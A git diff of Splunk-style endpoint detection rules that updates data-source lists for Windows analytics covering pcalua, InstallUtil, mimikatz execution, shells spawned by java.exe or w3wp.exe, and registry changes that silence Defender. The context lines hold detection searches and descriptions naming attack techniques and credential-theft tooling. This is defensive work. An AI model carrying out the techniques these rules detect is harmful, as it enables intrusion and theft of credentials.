diff --git a/detections/endpoint/windows_indirect_command_execution_via_pcalua.yml b/detections/endpoint/windows_indirect_command_execution_via_pcalua.yml
index cec4a83828..85a3095433 100644
--- a/detections/endpoint/windows_indirect_command_execution_via_pcalua.yml
+++ b/detections/endpoint/windows_indirect_command_execution_via_pcalua.yml
@@ -15,6 +15,8 @@ description: The following analytic detects programs initiated by pcalua.exe, th
   environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process="*pcalua*
   -a*" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/windows_indirect_command_execution_via_series_of_forfiles.yml b/detections/endpoint/windows_indirect_command_execution_via_series_of_forfiles.yml
index a5db471e72..219b7ab5a9 100644
--- a/detections/endpoint/windows_indirect_command_execution_via_series_of_forfiles.yml
+++ b/detections/endpoint/windows_indirect_command_execution_via_series_of_forfiles.yml
@@ -15,6 +15,8 @@ description: The following analytic detects excessive usage of the forfiles.exe
   or further malicious actions.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   values(Processes.process_guid) as process_guid  values(Processes.process_name) as
   process_name count min(_time) as firstTime max(_time) as lastTime  from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/windows_information_discovery_fsutil.yml b/detections/endpoint/windows_information_discovery_fsutil.yml
index d49801f8b6..9955f3ce9d 100644
--- a/detections/endpoint/windows_information_discovery_fsutil.yml
+++ b/detections/endpoint/windows_information_discovery_fsutil.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the Windows buil
   and plan subsequent actions such as privilege escalation or persistence.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name="fsutil.exe"
   OR Processes.original_file_name = "fsutil.exe" AND Processes.process = "*fsinfo*"
diff --git a/detections/endpoint/windows_ingress_tool_transfer_using_explorer.yml b/detections/endpoint/windows_ingress_tool_transfer_using_explorer.yml
index 7a6841a325..a860417c29 100644
--- a/detections/endpoint/windows_ingress_tool_transfer_using_explorer.yml
+++ b/detections/endpoint/windows_ingress_tool_transfer_using_explorer.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where the Windows Explo
   system compromise and further malicious activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = explorer.exe
   OR Processes.original_file_name = explorer.exe) AND NOT (Processes.parent_process_name
diff --git a/detections/endpoint/windows_installutil_in_non_standard_path.yml b/detections/endpoint/windows_installutil_in_non_standard_path.yml
index 758a320139..9e17deb2a9 100644
--- a/detections/endpoint/windows_installutil_in_non_standard_path.yml
+++ b/detections/endpoint/windows_installutil_in_non_standard_path.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of InstallUtil.exe fro
   access or persist within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes where `process_installutil` NOT (Processes.process_path
   IN ("*\\Windows\\ADWS\\*","*\\Windows\\SysWOW64*", "*\\Windows\\system32*", "*\\Windows\\NetworkController\\*",
diff --git a/detections/endpoint/windows_installutil_remote_network_connection.yml b/detections/endpoint/windows_installutil_remote_network_connection.yml
index b8d6a4dd73..3e4ded5b5b 100644
--- a/detections/endpoint/windows_installutil_remote_network_connection.yml
+++ b/detections/endpoint/windows_installutil_remote_network_connection.yml
@@ -15,7 +15,7 @@ description: 'The following analytic detects the Windows InstallUtil.exe binary
   network connections, and any associated file modifications to determine the legitimacy
   of this activity.'
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where `process_installutil` by _time span=1h  Processes.process_id Processes.process_name
   Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/windows_installutil_uninstall_option.yml b/detections/endpoint/windows_installutil_uninstall_option.yml
index b9f187a954..0a704ec3ec 100644
--- a/detections/endpoint/windows_installutil_uninstall_option.yml
+++ b/detections/endpoint/windows_installutil_uninstall_option.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the use of the Windows InstallUtil.
   within the environment.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_installutil` Processes.process
   IN ("*/u*", "*uninstall*") NOT (Processes.process IN ("*C:\\WINDOWS\\CCM\\*")) NOT
diff --git a/detections/endpoint/windows_installutil_uninstall_option_with_network.yml b/detections/endpoint/windows_installutil_uninstall_option_with_network.yml
index 39c7259c94..98edc863e1 100644
--- a/detections/endpoint/windows_installutil_uninstall_option_with_network.yml
+++ b/detections/endpoint/windows_installutil_uninstall_option_with_network.yml
@@ -14,7 +14,7 @@ description: 'The following analytic identifies the use of Windows InstallUtil.e
   code, potentially leading to system compromise, data exfiltration, or further lateral
   movement within the network.'
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where `process_installutil` Processes.process IN ("*/u*", "*uninstall*") by _time
   span=1h  Processes.user Processes.process_id Processes.process_name Processes.dest
diff --git a/detections/endpoint/windows_installutil_url_in_command_line.yml b/detections/endpoint/windows_installutil_url_in_command_line.yml
index ca9b2147fd..9f30dd1f26 100644
--- a/detections/endpoint/windows_installutil_url_in_command_line.yml
+++ b/detections/endpoint/windows_installutil_url_in_command_line.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the use of Windows InstallUtil.exe
   network connections, file modifications, and related processes for further investigation.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_installutil` Processes.process
   IN ("*http://*","*https://*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_java_spawning_shells.yml b/detections/endpoint/windows_java_spawning_shells.yml
index 78910c722e..268a73b7d2 100644
--- a/detections/endpoint/windows_java_spawning_shells.yml
+++ b/detections/endpoint/windows_java_spawning_shells.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where java.exe or w3wp.
   data exfiltration, or further lateral movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=java.exe
   OR Processes.parent_process_name=w3wp.exe `windows_shells` by Processes.dest Processes.user
diff --git a/detections/endpoint/windows_known_abused_dll_created.yml b/detections/endpoint/windows_known_abused_dll_created.yml
index b8eb9d459e..def54ea110 100644
--- a/detections/endpoint/windows_known_abused_dll_created.yml
+++ b/detections/endpoint/windows_known_abused_dll_created.yml
@@ -14,8 +14,7 @@ description: The following analytic identifies the creation of Dynamic Link Libr
   could allow attackers to blend in with legitimate operations, posing a severe threat
   to system integrity and security.
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes where Processes.parent_process_name!="unknown"
   Processes.process_name=* Processes.process_guid!=null by _time span=1h Processes.dest
diff --git a/detections/endpoint/windows_lateral_tool_transfer_remcom.yml b/detections/endpoint/windows_lateral_tool_transfer_remcom.yml
index 9996ac5ea4..196699eaeb 100644
--- a/detections/endpoint/windows_lateral_tool_transfer_remcom.yml
+++ b/detections/endpoint/windows_lateral_tool_transfer_remcom.yml
@@ -7,6 +7,8 @@ type: TTP
 status: production
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the execution of RemCom.exe, an open-source
   alternative to PsExec, used for lateral movement and remote command execution. It
   leverages data from Endpoint Detection and Response (EDR) agents, focusing on process
diff --git a/detections/endpoint/windows_ldifde_directory_object_behavior.yml b/detections/endpoint/windows_ldifde_directory_object_behavior.yml
index a233880855..6e49a95030 100644
--- a/detections/endpoint/windows_ldifde_directory_object_behavior.yml
+++ b/detections/endpoint/windows_ldifde_directory_object_behavior.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the use of Ldifde.exe, a command-line
   utility for creating, modifying, or deleting LDAP directory objects. This detection
   leverages data from Endpoint Detection and Response (EDR) agents, focusing on process
diff --git a/detections/endpoint/windows_lsa_secrets_nolmhash_registry.yml b/detections/endpoint/windows_lsa_secrets_nolmhash_registry.yml
index 828e00bf9e..e63a6b0aae 100644
--- a/detections/endpoint/windows_lsa_secrets_nolmhash_registry.yml
+++ b/detections/endpoint/windows_lsa_secrets_nolmhash_registry.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   related to the Local Security Authority (LSA) NoLMHash setting. It identifies when
diff --git a/detections/endpoint/windows_masquerading_explorer_as_child_process.yml b/detections/endpoint/windows_masquerading_explorer_as_child_process.yml
index 6e1ff979c3..5450d746e5 100644
--- a/detections/endpoint/windows_masquerading_explorer_as_child_process.yml
+++ b/detections/endpoint/windows_masquerading_explorer_as_child_process.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where explorer.exe is s
   code, evade detection, and maintain persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN("cmd.exe", "powershell.exe", "regsvr32.exe") AND Processes.process_name = "explorer.exe"
diff --git a/detections/endpoint/windows_masquerading_msdtc_process.yml b/detections/endpoint/windows_masquerading_msdtc_process.yml
index a71d52bf86..3331347e54 100644
--- a/detections/endpoint/windows_masquerading_msdtc_process.yml
+++ b/detections/endpoint/windows_masquerading_msdtc_process.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the execution of msdtc.exe with specific
   command-line parameters (-a or -b), which are indicative of the PlugX malware. This
   detection leverages data from Endpoint Detection and Response (EDR) agents, focusing
diff --git a/detections/endpoint/windows_mimikatz_binary_execution.yml b/detections/endpoint/windows_mimikatz_binary_execution.yml
index 2c3e806bab..5eed6aaa66 100644
--- a/detections/endpoint/windows_mimikatz_binary_execution.yml
+++ b/detections/endpoint/windows_mimikatz_binary_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of the native mimik
   to potential data breaches and system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=mimikatz.exe
   OR Processes.original_file_name=mimikatz.exe) by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_modify_registry_authenticationleveloverride.yml b/detections/endpoint/windows_modify_registry_authenticationleveloverride.yml
index 28f8014766..69b3cf513b 100644
--- a/detections/endpoint/windows_modify_registry_authenticationleveloverride.yml
+++ b/detections/endpoint/windows_modify_registry_authenticationleveloverride.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   key "AuthenticationLevelOverride" within the Terminal Server Client settings. It
diff --git a/detections/endpoint/windows_modify_registry_auto_minor_updates.yml b/detections/endpoint/windows_modify_registry_auto_minor_updates.yml
index 2a72081010..f7134f4fb3 100644
--- a/detections/endpoint/windows_modify_registry_auto_minor_updates.yml
+++ b/detections/endpoint/windows_modify_registry_auto_minor_updates.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Hunting
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic identifies a suspicious modification to the Windows
   auto update configuration registry. It detects changes to the registry path 
diff --git a/detections/endpoint/windows_modify_registry_auto_update_notif.yml b/detections/endpoint/windows_modify_registry_auto_update_notif.yml
index f88ce7e5aa..d0c1d43e7a 100644
--- a/detections/endpoint/windows_modify_registry_auto_update_notif.yml
+++ b/detections/endpoint/windows_modify_registry_auto_update_notif.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a suspicious modification to the Windows
   registry that changes the auto-update notification setting to "Notify before download."
diff --git a/detections/endpoint/windows_modify_registry_default_icon_setting.yml b/detections/endpoint/windows_modify_registry_default_icon_setting.yml
index 6325f12c1a..034a6152ca 100644
--- a/detections/endpoint/windows_modify_registry_default_icon_setting.yml
+++ b/detections/endpoint/windows_modify_registry_default_icon_setting.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious modifications to the Wind
   lead to system defacement and signal a broader ransomware attack, potentially compromising
   sensitive data and system integrity.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count  min(_time) as firstTime
   max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path
diff --git a/detections/endpoint/windows_modify_registry_disable_restricted_admin.yml b/detections/endpoint/windows_modify_registry_disable_restricted_admin.yml
index b526a40c4a..649ccc3627 100644
--- a/detections/endpoint/windows_modify_registry_disable_restricted_admin.yml
+++ b/detections/endpoint/windows_modify_registry_disable_restricted_admin.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   entry "DisableRestrictedAdmin," which controls the Restricted Admin mode behavior.
diff --git a/detections/endpoint/windows_modify_registry_disable_toast_notifications.yml b/detections/endpoint/windows_modify_registry_disable_toast_notifications.yml
index 0c0d4cfcb6..7b6a0c6bfc 100644
--- a/detections/endpoint/windows_modify_registry_disable_toast_notifications.yml
+++ b/detections/endpoint/windows_modify_registry_disable_toast_notifications.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
   malicious, this action could allow attackers to operate undetected, leading to prolonged
   persistence and potential further compromise of the system.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled*"
diff --git a/detections/endpoint/windows_modify_registry_disable_win_defender_raw_write_notif.yml b/detections/endpoint/windows_modify_registry_disable_win_defender_raw_write_notif.yml
index ca18f20edd..a168702d5e 100644
--- a/detections/endpoint/windows_modify_registry_disable_win_defender_raw_write_notif.yml
+++ b/detections/endpoint/windows_modify_registry_disable_win_defender_raw_write_notif.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
   to execute code, persist in the environment, and access sensitive information without
   detection.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\Windows
diff --git a/detections/endpoint/windows_modify_registry_disable_windefender_notifications.yml b/detections/endpoint/windows_modify_registry_disable_windefender_notifications.yml
index 04af8a5dfd..9d55f54208 100644
--- a/detections/endpoint/windows_modify_registry_disable_windefender_notifications.yml
+++ b/detections/endpoint/windows_modify_registry_disable_windefender_notifications.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a suspicious registry modification aimed
   at disabling Windows Defender notifications. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_disable_windows_security_center_notif.yml b/detections/endpoint/windows_modify_registry_disable_windows_security_center_notif.yml
index 944bbb2aea..6a7e5cf8f8 100644
--- a/detections/endpoint/windows_modify_registry_disable_windows_security_center_notif.yml
+++ b/detections/endpoint/windows_modify_registry_disable_windows_security_center_notif.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
   undetected, potentially leading to further exploitation and compromise of the host
   system.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience*"
diff --git a/detections/endpoint/windows_modify_registry_disableremotedesktopantialias.yml b/detections/endpoint/windows_modify_registry_disableremotedesktopantialias.yml
index 7b3ed78c86..6ec37a2410 100644
--- a/detections/endpoint/windows_modify_registry_disableremotedesktopantialias.yml
+++ b/detections/endpoint/windows_modify_registry_disableremotedesktopantialias.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   key "DisableRemoteDesktopAntiAlias" with a value set to 0x00000001. This detection
diff --git a/detections/endpoint/windows_modify_registry_disablesecuritysettings.yml b/detections/endpoint/windows_modify_registry_disablesecuritysettings.yml
index 51df5de3ed..df7bd7bf55 100644
--- a/detections/endpoint/windows_modify_registry_disablesecuritysettings.yml
+++ b/detections/endpoint/windows_modify_registry_disablesecuritysettings.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   that disable security settings for Terminal Services. It leverages the Endpoint
diff --git a/detections/endpoint/windows_modify_registry_disabling_wer_settings.yml b/detections/endpoint/windows_modify_registry_disabling_wer_settings.yml
index d26073ec5f..b3d1d4f59c 100644
--- a/detections/endpoint/windows_modify_registry_disabling_wer_settings.yml
+++ b/detections/endpoint/windows_modify_registry_disabling_wer_settings.yml
@@ -13,7 +13,7 @@ description: The following analytic detects modifications in the Windows registr
   If confirmed malicious, this could allow attackers to operate undetected, potentially
   leading to prolonged persistence and further exploitation within the environment.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\Windows
diff --git a/detections/endpoint/windows_modify_registry_disallow_windows_app.yml b/detections/endpoint/windows_modify_registry_disallow_windows_app.yml
index 7fa3ba2780..22d3783127 100644
--- a/detections/endpoint/windows_modify_registry_disallow_windows_app.yml
+++ b/detections/endpoint/windows_modify_registry_disallow_windows_app.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the Windows registr
   malicious, this could allow an attacker to evade detection and maintain persistence
   on the compromised host.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun*"
diff --git a/detections/endpoint/windows_modify_registry_do_not_connect_to_win_update.yml b/detections/endpoint/windows_modify_registry_do_not_connect_to_win_update.yml
index e165e8ebe5..71bd681e79 100644
--- a/detections/endpoint/windows_modify_registry_do_not_connect_to_win_update.yml
+++ b/detections/endpoint/windows_modify_registry_do_not_connect_to_win_update.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a suspicious modification to the Windows
   registry that disables automatic updates. It leverages data from the Endpoint datamodel,
diff --git a/detections/endpoint/windows_modify_registry_dontshowui.yml b/detections/endpoint/windows_modify_registry_dontshowui.yml
index 6f4f26d691..5264f4251f 100644
--- a/detections/endpoint/windows_modify_registry_dontshowui.yml
+++ b/detections/endpoint/windows_modify_registry_dontshowui.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows Error Reporting
   registry key "DontShowUI" to suppress error reporting dialogs. It leverages data
diff --git a/detections/endpoint/windows_modify_registry_enablelinkedconnections.yml b/detections/endpoint/windows_modify_registry_enablelinkedconnections.yml
index c57b4e44ec..49e5c60bf6 100644
--- a/detections/endpoint/windows_modify_registry_enablelinkedconnections.yml
+++ b/detections/endpoint/windows_modify_registry_enablelinkedconnections.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a suspicious modification to the Windows
   registry setting for EnableLinkedConnections. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_longpathsenabled.yml b/detections/endpoint/windows_modify_registry_longpathsenabled.yml
index 1822366cb3..be3d23dcb8 100644
--- a/detections/endpoint/windows_modify_registry_longpathsenabled.yml
+++ b/detections/endpoint/windows_modify_registry_longpathsenabled.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a modification to the Windows registry
   setting "LongPathsEnabled," which allows file paths longer than 260 characters.
diff --git a/detections/endpoint/windows_modify_registry_maxconnectionperserver.yml b/detections/endpoint/windows_modify_registry_maxconnectionperserver.yml
index effdb82672..3da3cb3c99 100644
--- a/detections/endpoint/windows_modify_registry_maxconnectionperserver.yml
+++ b/detections/endpoint/windows_modify_registry_maxconnectionperserver.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic identifies a suspicious modification of the Windows
   registry setting for max connections per server. It detects changes to specific
diff --git a/detections/endpoint/windows_modify_registry_no_auto_reboot_with_logon_user.yml b/detections/endpoint/windows_modify_registry_no_auto_reboot_with_logon_user.yml
index a9825acf86..e961a39544 100644
--- a/detections/endpoint/windows_modify_registry_no_auto_reboot_with_logon_user.yml
+++ b/detections/endpoint/windows_modify_registry_no_auto_reboot_with_logon_user.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a suspicious modification to the Windows
   registry that disables automatic reboot with a logged-on user. This detection leverages
diff --git a/detections/endpoint/windows_modify_registry_no_auto_update.yml b/detections/endpoint/windows_modify_registry_no_auto_update.yml
index 068495e512..f4edf71299 100644
--- a/detections/endpoint/windows_modify_registry_no_auto_update.yml
+++ b/detections/endpoint/windows_modify_registry_no_auto_update.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic identifies a suspicious modification to the Windows
   registry that disables automatic updates. It detects changes to the registry path
diff --git a/detections/endpoint/windows_modify_registry_nochangingwallpaper.yml b/detections/endpoint/windows_modify_registry_nochangingwallpaper.yml
index 1b2fba591d..0004e9f3de 100644
--- a/detections/endpoint/windows_modify_registry_nochangingwallpaper.yml
+++ b/detections/endpoint/windows_modify_registry_nochangingwallpaper.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   aimed at preventing wallpaper changes. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_proxyenable.yml b/detections/endpoint/windows_modify_registry_proxyenable.yml
index 1c7713ebe9..60f720e50c 100644
--- a/detections/endpoint/windows_modify_registry_proxyenable.yml
+++ b/detections/endpoint/windows_modify_registry_proxyenable.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   key "ProxyEnable" to enable proxy settings. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_proxyserver.yml b/detections/endpoint/windows_modify_registry_proxyserver.yml
index 83f4e5bae7..5870318cda 100644
--- a/detections/endpoint/windows_modify_registry_proxyserver.yml
+++ b/detections/endpoint/windows_modify_registry_proxyserver.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects modifications to the Windows registry
   key for setting up a proxy server. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_qakbot_binary_data_registry.yml b/detections/endpoint/windows_modify_registry_qakbot_binary_data_registry.yml
index b5232301d2..a91ab6e4ea 100644
--- a/detections/endpoint/windows_modify_registry_qakbot_binary_data_registry.yml
+++ b/detections/endpoint/windows_modify_registry_qakbot_binary_data_registry.yml
@@ -14,9 +14,8 @@ description: The following analytic detects the creation of a suspicious registr
   data. If confirmed malicious, this could allow attackers to maintain persistence
   and execute arbitrary code on the compromised system.
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 12
-- Sysmon EventID 13
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count dc(registry_value_name) as
   registry_value_name_count FROM datamodel=Endpoint.Registry where Registry.registry_path="*\\SOFTWARE\\Microsoft\\*"
   AND Registry.registry_value_data = "Binary Data" by _time span=1m Registry.dest
diff --git a/detections/endpoint/windows_modify_registry_reg_restore.yml b/detections/endpoint/windows_modify_registry_reg_restore.yml
index d1a53adcac..961ae033b1 100644
--- a/detections/endpoint/windows_modify_registry_reg_restore.yml
+++ b/detections/endpoint/windows_modify_registry_reg_restore.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of reg.exe with the "r
   potentially bypassing security controls and maintaining persistence.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where  `process_reg` AND Processes.process
   = "* restore *" by Processes.process_name Processes.original_file_name Processes.process
diff --git a/detections/endpoint/windows_modify_registry_regedit_silent_reg_import.yml b/detections/endpoint/windows_modify_registry_regedit_silent_reg_import.yml
index fbdb72e48b..6bcd169e25 100644
--- a/detections/endpoint/windows_modify_registry_regedit_silent_reg_import.yml
+++ b/detections/endpoint/windows_modify_registry_regedit_silent_reg_import.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the modification of the Windows regi
   configurations, leading to potential system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` values(Processes.process) as process
   min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
   where (Processes.process_name="regedit.exe" OR Processes.original_file_name="regedit.exe")
diff --git a/detections/endpoint/windows_modify_registry_suppress_win_defender_notif.yml b/detections/endpoint/windows_modify_registry_suppress_win_defender_notif.yml
index c863f2df58..f3317d9729 100644
--- a/detections/endpoint/windows_modify_registry_suppress_win_defender_notif.yml
+++ b/detections/endpoint/windows_modify_registry_suppress_win_defender_notif.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications in the Windows registr
   detection, maintain persistence, and execute further malicious activities without
   alerting the user or security tools.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\Windows
